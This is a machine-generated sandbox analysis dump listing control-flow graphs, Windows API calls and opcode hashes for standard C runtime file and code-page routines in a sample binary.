                                                              control_flow_graph 539 203d0d-203d26 540 203d28-203d38 call 208354 539->540 541 203d3c-203d41 539->541 540->541 547 203d3a 540->547 542 203d43-203d4b 541->542 543 203d4e-203d74 call 20035b 541->543 542->543 549 203eea-203efb call 1f4de3 543->549 550 203d7a-203d85 543->550 547->541 552 203d8b-203d90 550->552 553 203edd 550->553 555 203d92-203d9b call 206c50 552->555 556 203da9-203db4 call 1fed36 552->556 557 203edf 553->557 555->557 565 203da1-203da7 555->565 556->557 564 203dba 556->564 559 203ee1-203ee8 call 20023a 557->559 559->549 567 203dc0-203dc5 564->567 565->567 567->557 568 203dcb-203de0 call 20035b 567->568 568->557 571 203de6-203df8 call 1fd03c 568->571 573 203dfd-203e01 571->573 573->557 574 203e07-203e0f 573->574 575 203e11-203e16 574->575 576 203e49-203e55 574->576 575->559 579 203e1c-203e1e 575->579 577 203ed2 576->577 578 203e57-203e59 576->578 582 203ed4-203edb call 20023a 577->582 580 203e5b-203e64 call 206c50 578->580 581 203e6e-203e79 call 1fed36 578->581 579->557 583 203e24-203e3e call 1fd03c 579->583 580->582 592 203e66-203e6c 580->592 581->582 593 203e7b 581->593 582->557 583->559 594 203e44 583->594 595 203e81-203e86 592->595 593->595 594->557 595->582 596 203e88-203ea0 call 1fd03c 595->596 596->582 599 203ea2-203ea9 596->599 600 203eca-203ed0 599->600 601 203eab-203eac 599->601 602 203ead-203ebf call 20177f 600->602 601->602 602->582 605 203ec1-203ec8 call 20023a 602->605 605->559
                                                              APIs
                                                              • __freea.LIBCMT ref: 00203EC2
                                                                • Part of subcall function 001FED36: RtlAllocateHeap.NTDLL(00000000,001FDFD7,?,?,001FDFD7,00000220,?,?,?), ref: 001FED68
                                                              • __freea.LIBCMT ref: 00203ED5
                                                              • __freea.LIBCMT ref: 00203EE2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: __freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 2243444508-0
                                                              • Opcode ID: 4f00e9e43350a175dc68fa9dc85cb54306111037028b252fe0614bc1c60a1ec6
                                                              • Instruction ID: 9a89eac5d655ba0e9de1e2e2f379482bfec6277944ec1a0340443f1aeb4a5904
                                                              • Opcode Fuzzy Hash: 4f00e9e43350a175dc68fa9dc85cb54306111037028b252fe0614bc1c60a1ec6
                                                              • Instruction Fuzzy Hash: 2E51C27262030AAFEB21DF61CC85EBB76ADEF54710F150629FD04D6192EB31DE718A60

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 608 204065-204087 609 20427a 608->609 610 20408d-20408f 608->610 613 20427c-204280 609->613 611 204091-2040b0 call 1fa742 610->611 612 2040bb-2040de 610->612 619 2040b3-2040b6 611->619 615 2040e0-2040e2 612->615 616 2040e4-2040ea 612->616 615->616 618 2040ec-2040fd 615->618 616->611 616->618 620 204110-204120 call 204392 618->620 621 2040ff-20410d call 20364e 618->621 619->613 626 204122-204128 620->626 627 204169-20417b 620->627 621->620 628 204151-204167 call 20440f 626->628 629 20412a-20412d 626->629 630 2041d2-2041f2 WriteFile 627->630 631 20417d-204183 627->631 649 20414a-20414c 628->649 632 204138-204147 call 2047d6 629->632 633 20412f-204132 629->633 635 2041f4-2041fa GetLastError 630->635 636 2041fd 630->636 637 204185-204188 631->637 638 2041be-2041cb call 20483e 631->638 632->649 633->632 639 204212-204215 633->639 635->636 643 204200-20420b 636->643 644 2041aa-2041bc call 204a02 637->644 645 20418a-20418d 637->645 648 2041d0 638->648 652 204218-20421a 639->652 650 204275-204278 643->650 651 20420d-204210 643->651 655 2041a5-2041a8 644->655 645->652 653 204193-2041a0 call 204919 645->653 648->655 649->643 650->613 651->639 656 204248-204254 652->656 657 20421c-204221 652->657 653->655 655->649 659 204256-20425c 656->659 660 20425e-204270 656->660 661 204223-204235 657->661 662 20423a-204243 call 1febca 657->662 659->609 659->660 660->619 661->619 662->619
                                                              APIs
                                                                • Part of subcall function 0020440F: GetConsoleOutputCP.KERNEL32(BDC1E488,00000000,00000000,?), ref: 00204472
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,001F7E12,?,001F8074), ref: 002041EA
                                                              • GetLastError.KERNEL32(?,001F7E12,?,001F8074,?,001F8074,?,?,?,?,?,?,?,?,?,?), ref: 002041F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorFileLastOutputWrite
                                                              • String ID:
                                                              • API String ID: 2915228174-0
                                                              • Opcode ID: 8c2ce716726a846f901ff7da01ffe08edb86ce6b9d381e96b47ddb12f061ad95
                                                              • Instruction ID: 203fce87f232fb435e5d723c310e90eae3990808dce04c490c354dc141e53261
                                                              • Opcode Fuzzy Hash: 8c2ce716726a846f901ff7da01ffe08edb86ce6b9d381e96b47ddb12f061ad95
                                                              • Instruction Fuzzy Hash: 4661D7F192021AAFDF11EFA8D844EEEBBB9AF18304F148145FA04A7297D771D961CB50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 665 1fdc0a-1fdc32 call 1fde0f 668 1fdc38-1fdc3e 665->668 669 1fddf7-1fddf8 call 1fde80 665->669 671 1fdc41-1fdc47 668->671 672 1fddfd-1fddff 669->672 673 1fdc4d-1fdc59 671->673 674 1fdd43-1fdd62 call 1f7460 671->674 675 1fde00-1fde0e call 1f4de3 672->675 673->671 676 1fdc5b-1fdc61 673->676 682 1fdd65-1fdd6a 674->682 680 1fdd3b-1fdd3e 676->680 681 1fdc67-1fdc73 IsValidCodePage 676->681 680->675 681->680 684 1fdc79-1fdc80 681->684 685 1fdd6c-1fdd71 682->685 686 1fdda7-1fddb1 682->686 687 1fdca2-1fdcaf GetCPInfo 684->687 688 1fdc82-1fdc8e 684->688 689 1fdda4 685->689 690 1fdd73-1fdd7b 685->690 686->682 691 1fddb3-1fdddd call 1fe15b 686->691 693 1fdd2f-1fdd35 687->693 694 1fdcb1-1fdcd0 call 1f7460 687->694 692 1fdc92-1fdc9d 688->692 689->686 695 1fdd7d-1fdd80 690->695 696 1fdd9c-1fdda2 690->696 707 1fddde-1fdded 691->707 698 1fddef-1fddf0 call 1fe199 692->698 693->669 693->680 694->692 705 1fdcd2-1fdcd9 694->705 701 1fdd82-1fdd88 695->701 696->685 696->689 704 1fddf5 698->704 701->696 706 1fdd8a-1fdd9a 701->706 704->672 708 1fdcdb-1fdce0 705->708 709 1fdd05-1fdd08 705->709 706->696 706->701 707->698 707->707 708->709 710 1fdce2-1fdcea 708->710 711 1fdd0d-1fdd14 709->711 712 1fdcfd-1fdd03 710->712 713 1fdcec-1fdcf3 710->713 711->711 714 1fdd16-1fdd2a call 1fe15b 711->714 712->708 712->709 715 1fdcf4-1fdcfb 713->715 714->692 715->712 715->715
                                                              APIs
                                                                • Part of subcall function 001FDE0F: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 001FDE3A
                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,001FE01A,?,00000000,?,?,?), ref: 001FDC6B
                                                              • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,001FE01A,?,00000000,?,?,?), ref: 001FDCA7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: CodeInfoPageValid
                                                              • String ID:
                                                              • API String ID: 546120528-0
                                                              • Opcode ID: 228ca091c953d4356861c2e1620f4609969f22dc711f98b7681585969f373430
                                                              • Instruction ID: b1e87376c1fae47a74ca0222f00005574e16e6f4d2cb241c72148eaa72e15378
                                                              • Opcode Fuzzy Hash: 228ca091c953d4356861c2e1620f4609969f22dc711f98b7681585969f373430
                                                              • Instruction Fuzzy Hash: 63512470A0024C9EDB21CFB5D880AFAFBF6EF91304F14416ED2868B291D7749A46CB90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 718 20483e-204893 call 2038f0 721 204895 718->721 722 204908-204918 call 1f4de3 718->722 724 20489b 721->724 726 2048a1-2048a3 724->726 727 2048a5-2048aa 726->727 728 2048bd-2048e2 WriteFile 726->728 729 2048b3-2048bb 727->729 730 2048ac-2048b2 727->730 731 204900-204906 GetLastError 728->731 732 2048e4-2048ef 728->732 729->726 729->728 730->729 731->722 732->722 733 2048f1-2048fc 732->733 733->724 734 2048fe 733->734 734->722
                                                              APIs
                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,002041D0,?,001F8074,?,?,?,00000000), ref: 002048DA
                                                              • GetLastError.KERNEL32(?,002041D0,?,001F8074,?,?,?,00000000,?,?,?,?,?,001F7E12,?,001F8074), ref: 00204900
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID:
                                                              • API String ID: 442123175-0
                                                              • Opcode ID: 035d62a3b821cbf65f4e3e02f441dbedc83b53a6ca709a9571dd802c0025b609
                                                              • Instruction ID: de6927c129ce85b972f17420cd26092111b2d4ef0e3a94cb65f9348f187bb553
                                                              • Opcode Fuzzy Hash: 035d62a3b821cbf65f4e3e02f441dbedc83b53a6ca709a9571dd802c0025b609
                                                              • Instruction Fuzzy Hash: 9521B174A102199FCB15DF19DC80AEAB7F9EB5C301F2480A9EA06D7252D730EE52CB60

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 735 1fda72-1fda77 736 1fda79-1fda91 735->736 737 1fda9f-1fdaa8 736->737 738 1fda93-1fda97 736->738 740 1fdaba 737->740 741 1fdaaa-1fdaad 737->741 738->737 739 1fda99-1fda9d 738->739 742 1fdb14-1fdb18 739->742 745 1fdabc-1fdac9 GetStdHandle 740->745 743 1fdaaf-1fdab4 741->743 744 1fdab6-1fdab8 741->744 742->736 746 1fdb1e-1fdb21 742->746 743->745 744->745 747 1fdacb-1fdacd 745->747 748 1fdaf6-1fdb08 745->748 747->748 750 1fdacf-1fdad8 GetFileType 747->750 748->742 749 1fdb0a-1fdb0d 748->749 749->742 750->748 751 1fdada-1fdae3 750->751 752 1fdaeb-1fdaee 751->752 753 1fdae5-1fdae9 751->753 752->742 754 1fdaf0-1fdaf4 752->754 753->742 754->742
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,001FD961,00212C58,0000000C), ref: 001FDABE
                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,001FD961,00212C58,0000000C), ref: 001FDAD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: FileHandleType
                                                              • String ID:
                                                              • API String ID: 3000768030-0
                                                              • Opcode ID: b01b8a351de390c56421ff83fe83368ea1cdcf9db569ae6b596ec7ab87c71c51
                                                              • Instruction ID: 665f6296e38083ad707efbf0d3d5402262a4e964563cfa28f7976bb638eb1fcd
                                                              • Opcode Fuzzy Hash: b01b8a351de390c56421ff83fe83368ea1cdcf9db569ae6b596ec7ab87c71c51
                                                              • Instruction Fuzzy Hash: E011D3716087454ACB348E3EBC8C632BA96AB56330B3D075ED6B6875F1C730D887D215

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 755 2037af-2037c7 call 201cdc 758 2037c9-2037d0 755->758 759 2037dd-2037f3 SetFilePointerEx 755->759 762 2037d7-2037db 758->762 760 2037f5-203806 GetLastError call 1febca 759->760 761 203808-203812 759->761 760->762 761->762 765 203814-203829 761->765 763 20382e-203831 762->763 765->763
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000002,?,00000000,?,?,?,00203667,00000000,?,?,00000002,00000000), ref: 002037EB
                                                              • GetLastError.KERNEL32(00000000,?,00203667,00000000,?,?,00000002,00000000,?,0020410A,?,00000000,00000000,00000002,?,?), ref: 002037F8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 0cfb174036eafaaca4b0dffb96a62979d40d435458d0a6a21b9758d59e002140
                                                              • Instruction ID: 0095f63e2badfc55cd9bfff5bd1d3837df39e26202cd18fc2aa6a62b6f93a328
                                                              • Opcode Fuzzy Hash: 0cfb174036eafaaca4b0dffb96a62979d40d435458d0a6a21b9758d59e002140
                                                              • Instruction Fuzzy Hash: 3B012B76620259AFCB05CF59DC05D9D3B29EB95320B244248F911972E1EA71EE61CB90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 767 1fd03c-1fd04b call 1fd28e 770 1fd04d-1fd072 LCMapStringEx 767->770 771 1fd074-1fd08e call 1fd099 LCMapStringW 767->771 775 1fd094-1fd096 770->775 771->775
                                                              APIs
                                                              • LCMapStringEx.KERNELBASE(?,00203DFD,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 001FD070
                                                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00203DFD,?,?,-00000008,?,00000000), ref: 001FD08E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: String
                                                              • String ID:
                                                              • API String ID: 2568140703-0
                                                              • Opcode ID: d1bcb85b07ad807db0dd8a60bf78d24d83047f6857a9c8c1ffd7cb5a674b078b
                                                              • Instruction ID: 49b38d7ed9b109d5d259601d861e2456e90758c98cf49ee39282dc4e0721b0f2
                                                              • Opcode Fuzzy Hash: d1bcb85b07ad807db0dd8a60bf78d24d83047f6857a9c8c1ffd7cb5a674b078b
                                                              • Instruction Fuzzy Hash: B2F02D3640021DBBCF125F90EC05DEE3F66AB58764F058111BB1965120CB36C972AB91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 776 202156-20216a call 201cdc 779 202170-202178 776->779 780 20216c-20216e 776->780 782 202183-202186 779->782 783 20217a-202181 779->783 781 2021be-2021de call 201e59 780->781 792 2021f0 781->792 793 2021e0-2021ee call 1febca 781->793 786 2021a4-2021b4 call 201cdc CloseHandle 782->786 787 202188-20218c 782->787 783->782 785 20218e-2021a2 call 201cdc * 2 783->785 785->780 785->786 786->780 795 2021b6-2021bc GetLastError 786->795 787->785 787->786 797 2021f2-2021f5 792->797 793->797 795->781
                                                              APIs
                                                              • CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,002022E4,00000000,CF830579,00212DB8,0000000C,0020226C,001FAC7B,?), ref: 002021AC
                                                              • GetLastError.KERNEL32(?,002022E4,00000000,CF830579,00212DB8,0000000C,0020226C,001FAC7B,?), ref: 002021B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: CloseErrorHandleLast
                                                              • String ID:
                                                              • API String ID: 918212764-0
                                                              • Opcode ID: 47e5225142a1917bac43b7ecdb40809116f6198217617d75f15ebe068ceb3d33
                                                              • Instruction ID: b28f6e19998915c25935fb724cd9647dac7dc69424a9b49a5783f70ee7a46c1f
                                                              • Opcode Fuzzy Hash: 47e5225142a1917bac43b7ecdb40809116f6198217617d75f15ebe068ceb3d33
                                                              • Instruction Fuzzy Hash: A61148336243209ED7252A38B84DBBEA7494B92734F29011BFA1C975D3DF70C8768191

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 801 1fb88c-1fb899 802 1fb89b-1fb8be call 1fa742 801->802 803 1fb8c3-1fb8d7 call 1fff08 801->803 808 1fba2a-1fba2c 802->808 809 1fb8dc-1fb8e5 call 20366c 803->809 810 1fb8d9 803->810 812 1fb8ea-1fb8f9 809->812 810->809 813 1fb8fb 812->813 814 1fb909-1fb912 812->814 815 1fb9d3-1fb9d8 813->815 816 1fb901-1fb903 813->816 817 1fb926-1fb95a 814->817 818 1fb914-1fb921 814->818 819 1fba28-1fba29 815->819 816->814 816->815 821 1fb95c-1fb966 817->821 822 1fb9b7-1fb9c3 817->822 820 1fba26 818->820 819->808 820->819 825 1fb98d-1fb999 821->825 826 1fb968-1fb974 821->826 823 1fb9da-1fb9dd 822->823 824 1fb9c5-1fb9cc 822->824 827 1fb9e0-1fb9e8 823->827 824->815 825->823 829 1fb99b-1fb9b5 call 1fb4c5 825->829 826->825 828 1fb976-1fb988 call 1fb516 826->828 830 1fb9ea-1fb9f0 827->830 831 1fba24 827->831 828->819 829->827 834 1fba08-1fba0c 830->834 835 1fb9f2-1fba06 call 1fb6c1 830->835 831->820 839 1fba1f-1fba21 834->839 840 1fba0e-1fba1c call 203840 834->840 835->819 839->831 840->839
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16377b03b3326cc99a2729dbbe7d8ad274e1b6f0e79e79f55174dbb221e6d12e
                                                              • Instruction ID: 843f038e316c9ec4d40e77472a3a69dfa3b2004902ede8de12e085bbae706c13
                                                              • Opcode Fuzzy Hash: 16377b03b3326cc99a2729dbbe7d8ad274e1b6f0e79e79f55174dbb221e6d12e
                                                              • Instruction Fuzzy Hash: 7351A1B0A0820CAFDB14CF58CCC5EB9BBA5EF59364F258158FA499B252D3719E41CB90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 844 1fe199-1fe1bb 845 1fe2cd-1fe2f3 844->845 846 1fe1c1-1fe1d3 GetCPInfo 844->846 847 1fe2f8-1fe2fd 845->847 846->845 848 1fe1d9-1fe1e0 846->848 849 1fe2ff-1fe305 847->849 850 1fe307-1fe30d 847->850 851 1fe1e2-1fe1ec 848->851 853 1fe315-1fe317 849->853 854 1fe30f-1fe312 850->854 855 1fe319 850->855 851->851 852 1fe1ee-1fe201 851->852 856 1fe222-1fe224 852->856 857 1fe31b-1fe32d 853->857 854->853 855->857 858 1fe226-1fe25d call 20025a call 203cc4 856->858 859 1fe203-1fe20a 856->859 857->847 860 1fe32f-1fe33d call 1f4de3 857->860 870 1fe262-1fe290 call 203cc4 858->870 861 1fe219-1fe21b 859->861 864 1fe21d-1fe220 861->864 865 1fe20c-1fe20e 861->865 864->856 865->864 868 1fe210-1fe218 865->868 868->861 873 1fe292-1fe29d 870->873 874 1fe29f-1fe2a9 873->874 875 1fe2ab-1fe2ae 873->875 876 1fe2be-1fe2c9 874->876 877 1fe2bc 875->877 878 1fe2b0-1fe2ba 875->878 876->873 879 1fe2cb 876->879 877->876 878->876 879->860
                                                              APIs
                                                              • GetCPInfo.KERNEL32(00000083,?,00000005,001FE01A,?), ref: 001FE1CB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-0
                                                              • Opcode ID: cfd8604ddd728cf7aeb00b1822ea6f18aeefc253eb818a48729544858fd291b5
                                                              • Instruction ID: a9557f757583635b9b1799cdd567b69c1b037823a373bbb3630c51e47fb5ae7f
                                                              • Opcode Fuzzy Hash: cfd8604ddd728cf7aeb00b1822ea6f18aeefc253eb818a48729544858fd291b5
                                                              • Instruction Fuzzy Hash: 425139B190815CAADB118E28CC88BF9BBEDFF15304F1401E9E699C71A2D335AE45CF60
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: __wsopen_s
                                                              • String ID:
                                                              • API String ID: 3347428461-0
                                                              • Opcode ID: f898cde5b24d02ae0fcd7c3dfe83a0ef1109a57061efc4517e89ac61591af529
                                                              • Instruction ID: 511e6400cd91b213ba12aa5f693c1f244cf41b7b45723ccbc8f7442da91d476a
                                                              • Opcode Fuzzy Hash: f898cde5b24d02ae0fcd7c3dfe83a0ef1109a57061efc4517e89ac61591af529
                                                              • Instruction Fuzzy Hash: 4F118F7190420AEFCB05DF58E94599B7BF9EF48304F144066F805AB342DA71ED25CB64
                                                              APIs
